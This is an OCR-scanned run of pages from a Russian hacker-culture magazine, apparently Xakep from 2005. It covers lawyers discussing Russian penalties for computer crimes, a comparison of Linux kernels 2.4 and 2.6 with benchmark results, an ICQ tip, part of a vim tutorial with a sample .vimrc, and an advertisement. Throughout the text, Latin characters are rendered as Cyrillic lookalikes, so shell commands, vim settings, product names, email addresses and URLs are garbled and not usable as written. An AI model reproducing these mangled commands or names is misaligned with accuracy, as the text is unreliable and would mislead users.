нодательством предусмо- 
трена максимальная мера 
наказания? 

АС: Если взять основные: 

Статья 146. Нарушение ав- 
[после конфискации технику могут торских и смежных прав — 
вернуть не в лучшем виде] до пяти лет. 





Статья 272. Неправомерный доступ к компьютерной информации — 
до пяти лет. 

Статья 273. Создание, использование и распространение вредо- 
носных программ для ЭВМ — до семи лет. 

Статья 274. Нарушение правил эксплуатации ЭВМ, системы ЭВМ 
или их сети — до четырех лет. 

Как видим, максимальный срок — до семи лет лишения свобо- 
ды — можно, при большом старании, получить за компьютер- 
ный вирус. Но дело в том, что существует возможность наказа- 
ния по совокупности преступлений (создание и распростра- 
нение компьютерного вируса, содержащего оскорбление в 
адрес кого-то). Автор получит наказание по двум статьям и так 
далее. Итого, если сильно «повезет», в сумме может набежать 
до двадцати лет. 

К: Самое суровое наказание (до шести лет лишения свобо- 
ды) предусмотрено за изготовление, хранение, демон- 
страцию или рекламирование с использованием интерне- 
та материалов с порнографическими изображениями нес- 
овершеннолетних. Особенно если эти несовершеннолет- 
ние не достигли возраста 14 лет (от трех до восьми лет ли- 
шения свободы). 

тіпсІ\л/0гк: Допустим, хакера задержали. Доказательств его вины 
нет, и следователи собираются найти их на компьютере хакера. 
Но весь диск у него зашифрован, и хакер, естественно, ключ не 
дает. Как в этом случае поведут себя сотрудники МВД? 

АС: Для задержания необходимы весомые аргументы. Как прави- 
ло, то, что можно найти у подозреваемого, только дополняет уже 
имеющуюся картину, а не создает ее. 

К: Во-первых, задержание лица без веских на то оснований явля- 
ется грубым нарушением норм действующего законодательства. 
Поэтому никто реально не будет задерживать лицо без наличия 
отдельных доказательств его вины. Кому охота потерять работу, 
государственную пенсию и сесть за это на два года в красную 
зону? Тем более, сейчас, когда Генпрокуратура усилила свой 
прокурорский надзор. 

Во-вторых, при отсутствии у следствия ключа дешифрования 
назначается судебная компьютерно-техническая экспертиза, 
в ходе которой эксперт определяет ключ дешифрования ин- 
формации и раскрывает ее содержание. Гипотетически, если 
вдруг и появится хакер-профессионал в деле криптографии, 
что маловероятно, то эту экспертизу будут производить высо- 
копрофессиональные специалисты — выпускники соответ- 
ствующего факультета Бауманки или Академии криптографии 
и связи ФСБ России. Хотя пока успешно обходимся своими 
штатными экспертами. 

тіпс1\л/0гк: Как по-вашему, необходимо ли компьютерному юристу 
разбираться в компьютерах на высоком уровне? Или знания за- 
конов и прав достаточно? 

АС: Знания в компьютерной сфере, безусловно, необходимы. Без 
этого не может быть четкого представления ситуации и, соответ- 
ственно, квалифицированной юридической помощи. 

К: Грамотному компьютерному юристу нужно знать, как про- 
цессуально правильно использовать возможности компью- 
терных специалистов и экспертов! А самое главное — где 
таких можно найти и как материально заинтересовать для 
участия в деле © 
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Ядерные испытания тукса 

КАК МЫ ЗНАЕМ, ЯДРА БЫВАЮТ СТАБИЛЬНЫ- 
МИ И НЕСТАБИЛЬНЫМИ. ОТЛИЧИТЬ СТА- 
БИЛЬНОЕ ЯДРО ОТ НЕСТАБИЛЬНОГО ОЧЕНЬ 
ПРОСТО: ПО ВЕРСИИ ЯДРА. ЕСЛИ ВЕРСИЯ 
ЧЕТНАЯ: 2.0, 2.2, 2.4, 2.6 — ЯДРО ЯВЛЯЕТСЯ 
СТАБИЛЬНЫМ. ЕСЛИ ЖЕ НЕЧЕТНАЯ: 2.1, 2.3, 
2.5 — ПЕРЕД НАМИ НЕСТАБИЛЬНОЕ ЯДРО. 
СЕЙЧАС ПРАКТИЧЕСКИ ВСЕ НОВЫЕ ДИСТ- 
РИБУТИВЫ ОСНОВАНЫ НА ТЕКУЩЕЙ СТА- 
БИЛЬНОЙ ВЕРСИИ ЯДРА — 2.6. ДЕЙСТВИ- 
ТЕЛЬНО ЛИ ЯДРО 2.6 ЛУЧШЕ? МОЖЕТ, НЕ 
СТОИЛО ТРАТИТЬ ВРЕМЯ НА ПЕРЕХОД С 
ВЕРСИИ 2.4 НА ВЕРСИЮ 2.6? ЧТО МЫ, КАК 
ПРОСТЫЕ ПОЛЬЗОВАТЕЛИ /ХАКЕРЫ/АДМИ- 
НИСТРАТОРЫ ілчііх, получим от нового 
ЯДРА? ОБО ВСЕМ ЭТОМ МЫ ПОГОВОРИМ В 
ЭТОЙ СТАТЬЕ. ТАК КАК ВЕРСИЯ 2.6 УЖЕ ДА- 
ЛЕКО НЕ НОВАЯ, БУДЕМ НАЗЫВАТЬ ЕЕ ТЕ- 
КУЩЕЙ I Денис Колисниченко (сІІ"і5іІаЬ$@гтіаіІ.ги) 

Сравнение ядер веток 2.4 и 2.6 

[12.. .1536 Кб = 371 день] Первое ядро версии 2.6 вышло 
18 декабря 2003 года — как видишь, не так уж и недав- 
но. СГюпдеІод версии 2.6 весит всего лишь 12 Кб. Вот 
почему я (да и не только я) засомневался, стоит ли пе- 
реходить на 2.6.0. Но уже через три (!) недели (9 янва- 
ря 2004 года) выходит версия 2.6.1, размер сГюпдеІ- 
од'а которой составляет уже 189 Кб. Это почти в 16 раз 
больше! А сГюпдеІод последней версии ядра 2.6.10, 



[Динамика развития ядра 2.6] 

которая появилась на свет 24 декабря 2004 года (спустя год), за- 
нимает 1,5 Мб дискового пространства. Заметил динамику роста 
нового ядра? За год только файл изменений вырос в 1 28 раз. Озна- 
комиться с изменениями любой версии ядра ты можешь по адре- 
су зипзіТе.тЯ. сипі. сі/ОЗ/Ип их/Кегп еІ/ѵ2. 6 . 

[ориентация на предприятие] Прежде всего, нужно отметить ори- 
ентацию текущей версии 2.6 не на машины среднего класса, а 
на мощные и производительные серверы: 

- Поддержка 64 Гб оперативной памяти 

- Поддержка файловых систем размером в 16 Тб 

- Поддержка до 64-х центральных процессоров (86-Ьа5есІ ЗМР) 

- Поддержка N11 МА (Ыоп-ІІпіІюгт Метогу Ассезз) — 

неоднородного доступа к памяти 

- Поддержка следующего поколения ЗМР 

- Поддержка РАЕ (РГіузісаІ Асісігезз ЕхГепзіопз) 

- Поддержка 64 Гб памяти на 32-х разрядных машинах 

Вот теперь посмотри на этот список и скажи, что тебе нужно 
больше всего? Лично я не представляю себе 64-х процессорную 
машинку с 64 Гб оперативки. Самый мощный сервер, с которым я 
работал (а не просто видел), — это двухпроцессорный НР с 1 Гб 
оперативки. Когда видишь все это, пробирают двойственные 
чувства. С одной стороны: зачем это нужно, а с другой — гор- 
дость за любимую операционку. 

Если же говорить более конкретно, то время, потраченное на раз- 
работку нового ядра, не пропало даром. Чего стоит только сравни- 
тельная таблица характеристик ядер 2.4 и 2.6. Думаю, особо ком- 
ментировать эту таблицу незачем — цифры говорят сами за себя. 
Конечно, все это не говорит, что ядро изначально заточено под ЗМР 





и на обычных компьютерах с одним процессором будет медленно 
работать, — отнюдь нет. Хотя до тестов мы еще не дошли — вот как 
дойдем, так и увидим истинную разницу между 2.4 и 2.6. 

Однако размер оперативки и количество процессоров — это не 
самое главное. Посмотри еще раз на таблицу характеристик 
ядер. Видишь, во сколько раз повысилось количество таіог-уст- 
ройств? В 16 раз. Опять же, на домашних пользователях это изме- 
нение никак не скажется. А вот для серверов класса предприя- 
тия, где есть потребность адресовать много физических и вирту- 
альных устройств, это очень важно. 

С точки зрения безопасности положительным моментом в ядре 
2.6 является встроенная поддержка ІРзес. Напомню, что в ядре 
2.4 такой поддержки не было, а если ее нужно было реализо- 
вать, то это делалось, как правило, за счет посторонних патчей. 
Последнее важное изменение — это расширенная поддержка 
различных файловых систем. Хорошо это или плохо? Для серве- 
ра — хорошо, а вот для конечного пользователя — это спорный 
вопрос. Если ты любишь экспериментировать, тебе будет с чем 
познакомиться, а вот если ты относишься к тому числу пользова- 
телей Ппих, которые «поставили и забыли», то вряд ли поддержка 
дополнительных файловых систем как-то отразится на твоем 
компьютере. 

Что же касается обыкновенных пользователей, для них тоже есть 
приятные сюрпризы. Ведь новое ядро поддерживает новые уст- 
ройства. Вполне возможно, что если твое устройство не поддер- 
живалось ядром 2.4 (или поддерживалось не полностью), то но- 
вое ядро, скорее всего, будет его поддерживать. 

[разветвление 2.6] Ядро предыдущей версии 2.4 было в большей 
мере привязано к архитектуре х86. В ядре 2.6 такого явления не 
наблюдается. Этому послужило слияние проекта иСІіпих и ядра 
2.6. Что это дало новому ядру? Прежде всего, поддержку встро- 
енных систем, например систем сигнализации или обыкновенных 
РЭА. Список процессоров для таких систем довольно большой, и 
он не ограничен только процессорами известных фирм — НііасІпі, 
І\ІЕС и Моіогоіа. 

[управление планированием] Перед тем как приступить к сравне- 
нию производительности ядер 2.4 и 2.6, нужно отметить, что в ядре 
2.6 появились два значительных улучшения: первое — это новый 
планировщик процессов, а второе — новые планировщики вво- 
да/вывода. 

Начнем с планировщика процессов. Он разделяет процессорное 
время между всеми выполняемыми в данный момент процессами, 
обеспечивая тем самым иллюзию их параллельного выполнения 
(настоящее параллельное выполнение возможно только на ЗМР-ма- 
шинах). Новый планировщик включает новые алгоритмы, которые 
позволяют значительно улучшить выполнение процессов. Благодаря 
одному из таких алгоритмов планировщик может оштрафовать про- 
цесс. Такой подход позволяет улучшить планирование процессов и 
оптимизировать использование процессорного времени, а также 
обеспечивает последовательное выполнение всех процессов. 

Два новых планировщика ввода/вывода позволяют существенно 
повысить производительность системы ввода/вывода. Планиров- 
щик, используемый по умолчанию, гарантирует, что процессы по- 
лучат ввод/вывод вовремя (когда им это необходимо), с минималь- 
ными задержками и без организации ненужной очереди. Второй 
планировщик — это планировщик крайнего срока (беасіііпе-пла- 
нировщик), который назначает время истечения запроса, исполь- 



зуя три очереди, в то время как первый планировщик пытается 
предугадать І/О-запрос прежде, чем он потребуется процессу. 
Какой из планировщиков использовать? Если поискать в Сети ответ 
на этот вопрос, то найдется очень много документов, в которых при- 
водятся весомые аргументы в пользу первого или второго планиров- 
щика. Если сравнивать І/О-планировщик, используемый по умолча- 
нию, с планировщиком ядра 2.4, то результат превосходит все ожи- 
дания. На машине с процессором Хеоп чтение файла размером 
500 Мб занимает 37 секунд при использовании ядра 2.4 и 4 секунды 
(!) при использовании ядра 2.6. Это почти в десять раз быстрее. 
ЭеасІІіпе-планировщик тоже работает неплохо, но все же, как мне 
показалось, не так быстро, как планировщик по умолчанию. 

В любом случае ты можешь использовать любой из этих плани- 
ровщиков и решить для себя, какой из них лучше. Как уже отмеча- 
лось, первый планировщик используется по умолчанию, а для 
включения второго нужно передать ядру опцию 

еІеѵаіог=сІеасіІіпе 

Чтобы вернуться к использованию первого планировщика, доста- 
точно не указывать опцию еіеѵаіог. 

Помимо новых планировщиков, ядро 2.6 постигло еще несколько 
архитектурных изменений. Теперь ядро может компилироваться 
без поддержки выгрузки модуля, что обеспечит стабильную ра- 
боту ядра в случае, если кто-то попытается выгрузить модуль, ког- 
да он используется. 

[как откомпилировать новое ядро?] Изменился ли процесс ком- 
пилирования ядра? Да, изменился. Причем в лучшую сторону — 
разработчики постарались на славу. Процесс компиляции стал 
более дружественным, если можно так выразиться. Итак, обо 
всем по порядку. 

Первое, что бросается в глаза, — это измененный хсопіід (его новое 
название — дсопі). Теперь он написан на Оі, есть также версия для 
Ѳпоте — дсопіід. Думаю, новый интерфейс тебе понравится. Сначала 
несколько непривычно, особенно если ты раньше компилировал ядра 
версий 2.2 и 2.4 — немного другие разделы, новые опции. Но разработ- 
чики сделали это намеренно, и не для того, чтобы тебя запутать. Просто 
в новой версии ядра появилось столько новых возможностей, что старая 
организация меню себя уже исчерпала. Любителям теписопіід тоже 
есть чему порадоваться: теперь теписопіід работает быстрее, причем 
это «быстрее» хорошо ощущается. Теперь сам процесс компиляции: 

# таке дсоггі 

# таке Ьгітаде тосіиіез тосІиІезЭпзІаІІ 

# ср агсМ/і 386 /Ьооі/Ь 2 Ітаде /Ьооі/ту_кегпеІ 

# ср Зузіет.тар /Ьооі 

Можно, конечно, использовать таке іпзіаІІ, но не знаю как ты, а я 
предпочитаю прописывать новое ядро в Міо вручную. Ты заметил, 
что таке бер уже нет, поэтому вводить эту команду не нужно. Что 
мне еще понравилось — так это процесс перекомпиляции ядра. 
Теперь ядро перекомпилируется значительно быстрее, посколь- 
ку компилируются измененные части, а в ядре 2.4 и более старых 
происходила полная компиляция. 

Кажется, относительно ядра уже все — с новыми опциями ты и без 
меня разберешься, к интерфейсу постепенно тоже привыкнешь. А 
вот модули заслуживают отдельного разговора. Во-первых, теперь 
для управления модулями используется не тосіиіііз, как это было ра- 
нее, а тосіиіе-іпіі-іооіз. Данный пакет поддерживает все предыду- 
щие ядра, поэтому даже если у тебя все еще ядро 2.4, ты можешь 
обновить свой старый тосіиіііз. Во-вторых, при сборке некоторых мо- 




[дсопк поддержка сети] 



[ХАКЕР 04 [76] 05 097 ] 



[хакер 04 [76] 05 098 ] 



[ПРЕИМУЩЕСТВА И НЕДОСТАТКИ ЗМР] 

Как и все в этом мире, каждая технология имеет свои 
достоинства и недостатки. Вот достоинства одноранго- 
вого доступа (ЗМР): 

* Организовать вычислительный процесс очень прос- 
то, поскольку все процессоры обращаются к общей 
памяти по одному алгоритму. 

* В процессе генерации кода программ не нужно 
учитывать размещение данных в оперативке, благо- 
даря этому достигается высокая эффективность 
кода задачи. 



* Это традиционный проверенный метод, который ис- 
пользуется уже довольно давно. 

А недостатки ЗМР, наверное, более значительны, чем 
достоинства. Узкое место в этом алгоритме — это еди- 
ный путь доступа к оперативке. Увеличение числа про- 
цессоров в системе, казалось бы, должно повысить 
производительность, но при достижении критической 
точки увеличение числа процессоров может привести к 
снижению общей производительности — все это из-за 
неэффективного алгоритма доступа к оперативке. 




[цсопі: поддержка видео] 

дулей (в виде модуля, то есть без включения в ядро) иногда появляют- 
ся ошибки. Как выход могу посоветовать включить эти опции в ядро. 

[тесты] Наконец-то начинается самое интересное. Скорее все- 
го, ради этого раздела ты и читаешь статью. Ничего страшного, 
если даже ты не читал предыдущие разделы, а только просмот- 
рел таблицы — все и так понятно, когда видишь перед собой гра- 
фики и цифры. Можно очень долго говорить о скорости, оптимиза- 
ции, поддержке новых устройств, процессоров, сверхбольших 
объемах памяти. Но если система будет медленно работать, ко- 
му нужна поддержка тех 64-х процессоров? 

Скажу сразу — я не проводил тестирование самостоятельно, в 
Сети есть очень много тестов производительности с использова- 
нием более интересного оборудования, чем имеется у многих из 
нас дома. Проведенное тестирование более подробно описано 
на сайте ІпІоѴѴогІсІ, статья «І_іпых ѵ2.6 зсаіез іГю епіегргізе», поэто- 
му, если у тебя есть желание, можешь прочитать ее. 

Думаю, многие со мной согласятся — тестировать производи- 
тельность нового ядра на старых процессорах (класса Репііит 
II, III) нет особого смысла, поэтому для тестов были выбраны 
двухпроцессорные серверы, основанные на процессорах ІпіеІ 
Р4 Хеоп 3,06 ГГц, ІпіеІ и АІѴЮ Оріегоп 848 с тактовой частотой 2,2 
ГГц. В обоих случаях было установлено по 2 Гб оперативки. При 
тестировании сетевых приложений был использован гигабитный 
ЕіГіегпеі, а не обычный 100 Мбит. 

Для теста был выбран дистрибутив Ппих Реб Наі Епіегргізе Зегѵег 
3.0 и ядра 2.4.23 и 2.6.0. Да, не самое новое ядро, но сделано это 
было умышленно — сравнить последнюю, «с полным фаршем» 
версию прежнего ядра с новой базовой версией 2.6. Сравнивать 
будем по таким категориям: 

- Производительность ЗапгіЬа 

- Производительность МуЗОІ_ 

- Тестирование \Л/еЬ-сервера 

Начнем с первого теста — проверим, насколько новое ядро 
расторопнее справляется с общим доступом к файлам. Ос- 
новная цель тестирования — смоделировать реальную наг- 
рузку на сервер при работе с 12-ю сетевыми клиентами. Для 
замеров использовалась утилита зтЬіогіиге, входящая в сос- 
тав ЗатЬа 3.0.1 . 

При использовании ядра версии 2.6 ЗатЬа была на 73% быстрее на 
Хеоп-сервере, чем та же система, но с ядром 2.4. В случае с процес- 



сором (точнее, процессорами 
— их там два) от АІѴЮ тестируе- 
мая система стала расторопнее 
на 47%. Тоже неплохой результат, 
но все же не такой, как с процес- 
сором от ІпіеІ. Это объясняется 
тем, что процессоры Хеоп и 
Оріегоп имеют разную архитек- 
туру — х86 и х86_64. В целом, об- 
щая производительность Оріегоп 
выше, чем Хеоп: 72,9 Мб/с против 
67,3 Мб/с. 

Тестирование производитель- 
ности Му$ОІ_ производилось с 
помощью пакета ЗОІ_-ЬепсГі 
(как обычно), что же касается 
самого МуЗОІ_, то использова- 
лась его версия 3.23.58. Все 
ЗОІ_-запросы передавались по 
сети, чтобы сымитировать ре- 
альную ситуацию. Числа в диаг- 
рамме — это количество се- 
кунд, затраченных на все во- 
семь тестов ЗОІ_-ЬепсГ). 

Теперь результаты в диаграмме 
нужно интерпретировать по- 
другому — чем меньше, тем 
лучше. С базами данных ситуа- 
ция несколько другая — произ- 
водительность процессоров 
Оріегоп на ядре 2.6 возросла 
на 41%, а Хеоп — всего на 14%. 

Если же сравнивать не ядра, а 
процессоры, то производи- 
тельность процессоров Оріегоп 
на старом ядре примерно такая же, как Хеоп на новом ядре. 
Последний тест — это тестирование производительности \Л/еЬ- 
сервера АрасГіе 2.0.48. Кратко о проведении теста: использова- 
лась статическая НТМІ_-страница размером 21,5 Кб с двумя кар- 
тинками по 25 Кб. Для замеров использовалась утилита аЬ. Числа 
в таблице — это количество обработанных запросов в секунду. 
Производительность процессоров Хеоп при использовании ядра 
2.6 выросла на 39%, а процессоров Оріегоп — всего на 7%. 

Как видишь, разработчики ядра не просто сменили цифру в вер- 
сии ядра — они проделали огромный объем работы, благодаря 
которой ядро 2.6 стало еще более производительным. Дополни- 
тельную информацию о ядре, и не только версии 2.6, ты можешь 
найти в виртуальной энциклопедии «Ппих по-русски» — 
гиз-Іі п их. п е 1/т аіп . р/тр ? п от е=кегпеІ. © 



[Т ірз&Тгіскз] 

Хочешь увидеть свои советы в журнале? Присылай их на адрес 8кІуагоѵ@геаІ.хакер.ги. 

Ведущий рубрИКИ ТІрЗ&ТгІСкЗ Иван СКЛЯРОВ. Иван Скляров (ЗкІуагоѵѲгеаІ.хакер.ги) 

Чтобы в 1С0 поменять в окне 1С0 ѴѴеІсоте загружающуюся стра- 
ницу, нужно открыть в блокноте файл из папки, в которой уста- 
новлена Ася, — \баіаііІез\аіеІіпк.хтІ. Там в первых двух тэгах 
<ііет>...</ііет> меняем <ІЖ> и <САРТІ0І\І> зігеХ ; зііеУ по вку- 
су. Пробовал в 1С0 2003Ь, но уверен, что и в других версиях ра- 
ботает. ОітМап ОітМап@іпЬох.ги 




[диаграмма производительности ЗатЬа] 
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[диаграмма производительности МуЗСХ] 




[диаграмма производительности АрасЬе] 







ЮНИТЫ КРЕАТИФФ КОДИНГ УШХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20ЫЕ РЕВПІІМ НЬЮСЫ 





Почемудля навигации по 
документу в ѵіт использу- 
ются клавиши «\1'}к1»? Во 
времена создания ѵіт (точ- 
нее, его отца — ѵі) пользо- 
ватели работали за терми- 
налами, на которых не было 
многих клавиш современ- 
ной клавиатуры, в том чис- 
ле и клавиш перемещения. 




} 



ѴІМ: Ключ к совершенству 

СЕГОДНЯ ОЧЕНЬ ПОПУЛЯРНЫМ СТАЛ СПОР О 
РЕДАКТОРАХ. ОДНИМ НРАВИТСЯ ПРОСТОТА, 
ДРУГИМ — НАВОРОЧЕННОСТЬ, ТРЕТЬИМ — КРА- 
СИВЫЙ ИНТЕРФЕЙС. НО ПОЧТИ ВСЕ УЧАСТНИ- 
КИ ТАКИХ ДИСКУССИЙ ЗАБЫВАЮТ ОДНО ВАЖ- 
НОЕ ОБСТОЯТЕЛЬСТВО — ВСЕ ОНИ ПОСТОЯН- 
НО СТАЛКИВАЮТСЯ С ѴІМ. ЭТОТ РЕДАКТОР УЖЕ 
МНОГО ЛЕТ ИСПОЛЬЗУЕТСЯ КАК СТАНДАРТНЫЙ 
ВО МНОГИХ ІІЫІХ-иКЕ ОС, ЗАГРУЗОЧНЫХ ДИС- 
КАХ И ДИСКЕТАХ. ПОЭТОМУ ТОТ, КТО ЕГО ОС- 
ВОИТ, БУДЕТ ЧУВСТВОВАТЬ СЕБЯ КОМФОРТНО 
В ЛЮБОЙ СИСТЕМЕ. В ЭТОЙ СТАТЬЕ Я РАССКА- 
ЖУ, КАК ПРАВИЛЬНО И ЭФФЕКТИВНО ИСПОЛЬ- 
ЗОВАТЬ В СВОЕЙ РАБОТЕ ѴІМ I 1 1 т (]1т@Н$Т.ги) 



Приемы эффективной 
работы в ѴІМ 

[как все начиналось] А началось все с калифорнийс- 
кого университета Беркли и одного из разработчиков 
ВЗО-ІІІМІХ — Билла Джоя. Для новой операционной 
системы требовался хороший универсальный редак- 
тор, и Билл написал ѵі, взяв за основу исходники ре- 
дактора ет. Созданная вскоре свободная реализа- 
ция ѵі под названием пѵі обрела большую популяр- 
ность и стала фундаментом для многочисленных мо- 
дификаций. Одной из таких модификаций стал редак- 



тор ѵіт, разработанный Брамом Мооленаар. Первоначально 
сокращение ѵіт расшифровывалось как Ѵі ІМііаііоп («Имитация 
Ѵі»), но после внесения большого количества изменений в ориги- 
нальную версию пѵі название изменилось на Ѵі ІМргоѵесі («Улуч- 
шенный Ѵі»). В настоящее время ѵіт является самой развитой и 
популярной версией ѵі. 

[редактор для домохозяек] В этом разделе мы разберем основ- 
ные возможности ѵіт. Главное, что следует запомнить: редактор 
ѵіт — многорежимный. Между режимами можно переключаться 
по мере необходимости. Существует три основных режима: 

Ш Командный режим. Позволяет перемещаться по тексту и выпол- 
нять определенные действия над ним. Все символы клавиатуры 
не используются по прямому назначению (для набора текста), а 
выполняют специальные функции (навигация, копирование, уда- 
ление и др.). 

Ш Режим вставки. Самый обычный режим ввода текста, все наби- 
раемые символы на клавиатуре немедленно отображаются на 
экране. 

Щ Режим командной строки. Необходим для выполнения более 
глобальных операций над текстом и управления самим редакто- 
ром: изменение настроек, открытия новых файлов для редактиро- 
вания, поиск и др. 

Помимо основных, доступны еще три режима: визуальный, режим 
выделения и режим Ех. Их нет в оригинальном ѵі. 

Сразу после запуска ѵіт находится в командном режиме, это ос- 
новной режим работы редактора. Переход в режим ввода осуще- 
ствляется нажатием клавиши «і» или <ІІ\І5ЕРТ>. Переход обратно — 
клавиша <Е$С>. Режим командной строки доступен по клавише «:» 
(далее, для краткости, все команды этого режима будут начинать- 
ся с символа «:»). Открыть новый файл для редактирования можно, 
набрав «:е имя_файла», Сохраняет файл команда «:\л/». Чтобы вый- 
ти из редактора без сохранения изменений, достаточно набрать 
«рі», если же изменения необходимо сохранить, набирай «:\л/р». 

В режиме ввода действуют основные клавиши управления: стрел- 
ки для перемещения, клавиши <ВАСКЗРАСЕ>, <ЭЕІ_ЕТЕ> и др. 
Здесь все просто, как в блокноте. Сейчас нас больше интересу- 
ет командный режим. Он позволяет выполнять огромное количе- 
ство действий, от обычной навигации по тексту до написания сце- 
нариев для редактирования нескольких файлов. 

Для перемещения по тексту в ѵіт служат клавиши «Гі» (влево), «>> (вниз), 
«к» (вверх) и «I» (вправо). Но это очень примитивный способ навигации по 
документу, иногда бывает удобнее прыгать между целыми словами, и 
здесь нам поможет команда «ѵѵ» (ѵѵогсі). Она передвинет курсор на 
следующее по тексту слово. Вернуться обратно можно, нажав «Ь» 
(Ьаск). Так ты отправишь курсор к началу предыдущего слова. Если не- 
обходимо перейти к концу слова, то нажимай «е» (епб). Как и большин- 
ство других команд ѵіт, эти команды принимают числовой префикс, 
указывающий на количество выполнений команды. К примеру, введя 
«3\л/», ты попадешь к началу третьего слова. Быстро вернуться к началу 
текста можно, набрав «дд», а команда «0» (до) закинет курсор в конец 
текста. Вообще-то «0» чаще используется для перемещения к заданной 
строке, для чего необходимо предварительно указать номер строки, 
например «920» — перейти к 92-й строке. 
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[правим конфиги в ѵіт] 




[многооконный ѵіт] 



Большая часть споров между поклонниками 
ѵіт и етасв возникает именно из-за горячих 
клавиш управления. Ѵіт — простые команды 
в одну-две клавиши и мультирежимность. 
Етасв — отсутствие нужды постоянно прыгать 
между режимами и очень длинные, ставшие 
легендой, комбинации. 

Ѵіт предоставляет пользователю две основ- 
ные команды для удаления текста: «х» и «сі» 
(сіеіеіе). Первая затирает один символ под 
курсором и эквивалентна одиночному нажа- 
тию клавиши <0Е1_ЕТЕ>. Вторая предназначе- 
на для использования в связке с командами 
перемещения, то есть является оператором. 
Например «сІ\л/»— удалить все символы начи- 
ная с позиции курсора и до начала следую- 
щего слова. Так как команды перемещения 
принимают числовой префикс, появляется 
возможность удалять сразу несколько слов: 
«сІ2\л/» — стереть два слова. Удаленный текст 
не уничтожается безвозвратно, позже его 
можно вставить в любое место командой «р» 
(риі). Случайно удаленный текст можно вос- 
становить при помощи команды «и» (ипсіо). 
Еще один родственник «б» — команда «у» 
(уапкіпд). Она очень похожа на «б», но ис- 
пользуется для копирования текста. Как 
было сказано выше, удаленный текст мож- 
но позже восстановить, используя «р». Ко- 
манда копирования используется так же, 
но текст она не удаляет. 

[полезности] В этом разделе я кратко опи- 
шу некоторые полезные возможности ѵіт. 
Поиск — неотъемлемая часть любого ре- 
дактора. В ѵіт поиск выполняется по регу- 
лярным выражениям. Все, что нужно, — 
ввести команду «/» и регулярное выраже- 
ние, по которому будет происходить поиск. 
Не менее важной является функция заме- 
ны, когда редактор проходит по тексту и 
меняет все слова, совпавшие с шаблоном. 
В ѵіт такую операцию проделывает коман- 
да «: (диапазон)5/шаблон/замена/(флаги)». 
В качестве шаблона используется регуляр- 
ное выражение. Диапазон — это диапазон 
строк (весь текст — символ «%»), а флаги 
просто управляют поведением команды. 
По умолчанию заменяется только первое 
совпадение в строке, это можно изменить, 
указав флаг «д». 

Как и положено, возможность записи макро- 
сов тоже присутствует. Использовать эту фи- 
чу довольно просто, нажимаешь «дх», где «х» 
— любая буква латинского алфавита. Теперь 



вводишь любые команды, снова нажимаешь 
«ц». Все, макрос записан, для воспроизведе- 
ния нажимай «@х» («х» — это опять же буква). 
Ѵіт умеет работать в визуальном режиме, 
для входа в который достаточно нажать 
«ѵ». В этом режиме можно выделить блок 
текста, используя клавиши «кукі», а затем 
удалить («б»), копировать («у») или произ- 
вести поиск и замену. 

Когда работаешь сразу с несколькими 
файлами, удобно видеть их одновременно 
на экране. Ѵіт предоставляет такую воз- 
можность, позволяя разбить экран на нес- 
колько окон. Команда «:5рііі» делит теку- 
щее окно пополам по горизонтали, а 
«:ѵ5рііі» — по вертикали. Переход между 
окнами — комбинация «СігІ+\л/». Убивает 
окно стандартная команда «:д». 

Наверное, тебя уже достало все время ра- 
ботать с файлами в разных кодировках. 
Тем более неудобно такие файлы редакти- 
ровать. Не беспокойся, ѵіт тебе поможет. 
Просто открывай файл так: «:е ++епс=ко- 
дировка сам_файл». 

Еще одна полезная особенность команды 
«:е» — если вместо имени файла указать ка- 
талог, то на экране появится его содержи- 
мое, и ты сам сможешь выбрать нужный 
файл. 

Очень часто требуется вставить в текст со- 
держимое другого файла или вообще ре- 
зультат выполнения команды. Такая пот- 
ребность чаще всего возникает во время 
почтовой переписки для вставки в письмо 
каких-либо логов. Итак, допустим, у нас 
есть лог с именем Іод.іхі, и нам нужно ско- 
пировать его содержимое в текст, выпол- 
няем команду «:г Іод.іхі», и содержимое 
файла появляется прямо под курсором. 
Вставить строки, выдаваемые командой, 
не сложнее, вот так, например, можно по- 
местить в текст текущую дату: «:г ібаіе». 

В ѵіт есть пара операторов, меняющих ре- 
гистр символов: «ди» (перевести в нижний ре- 
гистр) и «діі» (перевести в верхний регистр). 

[делай с ним что хочешь] Ѵіт можно наст- 
роить для любых ситуаций и вкусов, он поз- 
воляет изменять практически все свои па- 
раметры. Я приведу небольшой (для ѵіт) 
пример довольно стандартного конфига на 
все случаи жизни. Единственное, что следу- 
ет запомнить: все конфигурационные опции 
можно менять во время работы ѵіт в режи- 
ме командной строки. Кстати, комментарии 
в конфиге ѵіт начинаются со знака ". 



[$ ѵі ~/.ѵітгс] 

11 Отключить режим совместимости с ѵі. 
Позволяет использовать полезные свой- 
ства редактора, отсутствующие в ориги- 
нальном ѵі. 
зеі посотраШэІе 
" Подсветка при поиске, 
зеі Ызеагсіт 

11 Игнорировать регистр при поиске, 
зеі ідпогесазе 

11 Визуально показывать перенос длинных 
строк. Перенесенные строки будут начи- 
наться с символа «+». 
зеі 5ІіоѵѵЬгеак=+ 

11 Автоматическая табуляция. Если теку- 
щая строка начинается с ТАВ, то и следу- 
ющая тоже, 
зеі аіЛоіпсіеп* 

" Показывать в правом нижнем углу экра- 
на координаты курсора, 
зе* гиіег 

" Показывать подсказку при вводе длин- 
ных команд, 
зеі зііоѵѵстсі 

11 Цветовая тема. Описание бери в ката- 
логе /изг/зІіаге/ѵіт/ѵітбЗ/соІогз. 
соіогз сіеіаиіі 

11 Язык справки. Только если установлен 
пакет гиѵіт. 
зеі НеІрІапд=ги 

" Подсветка синтаксиса. Очень поможет 
программистам, и не только, 
зупіах епаЫе 

" Подключать специфические модули для 
разных языков программирования, 
іііеіуре ріидіп оп 

[зачем нам ЮЕ?] Ты никогда не слышал, 
что отвечают бывалые ІІЫІХ-кодеры на 
вопрос о среде программирования? В 
ответ они говорят о том, что *піх сама по 
себе интегрированная среда разра- 
ботки, и рекомендуют пользоваться од- 
ним из двух редакторов — ѵіт или 
еігіасз. После этого начинается жест- 
кий флейм между поклонниками этих 
редакторов :). К чему это я? К тому, что 
ѵіт обладает большими возможностями 
для редактирования исходных текстов 
программ, о которых я бы хотел расска- 
зать в этой части статьи. 

Вот несколько приемов, которыми я посто- 
янно пользуюсь и рекомендую тебе взять 
на вооружение: 




[хакер 04 [76] 05 101 ] 



Планируешь покупку цифровой камеры, 
но не знаешь, какую модель выбрать? 

Прочитав наш журнал, 

ты обязательно сделаешь правильный выбор и 

НАЙДЕШЬ СВОЮ КАМЕРУ! 




ЧИТАЙ В АПРЕЛЬСКОМ 
НОМЕРЕ: 

Идеальная камера: какая из 
них твоя? 

Выбираем вспышку» 




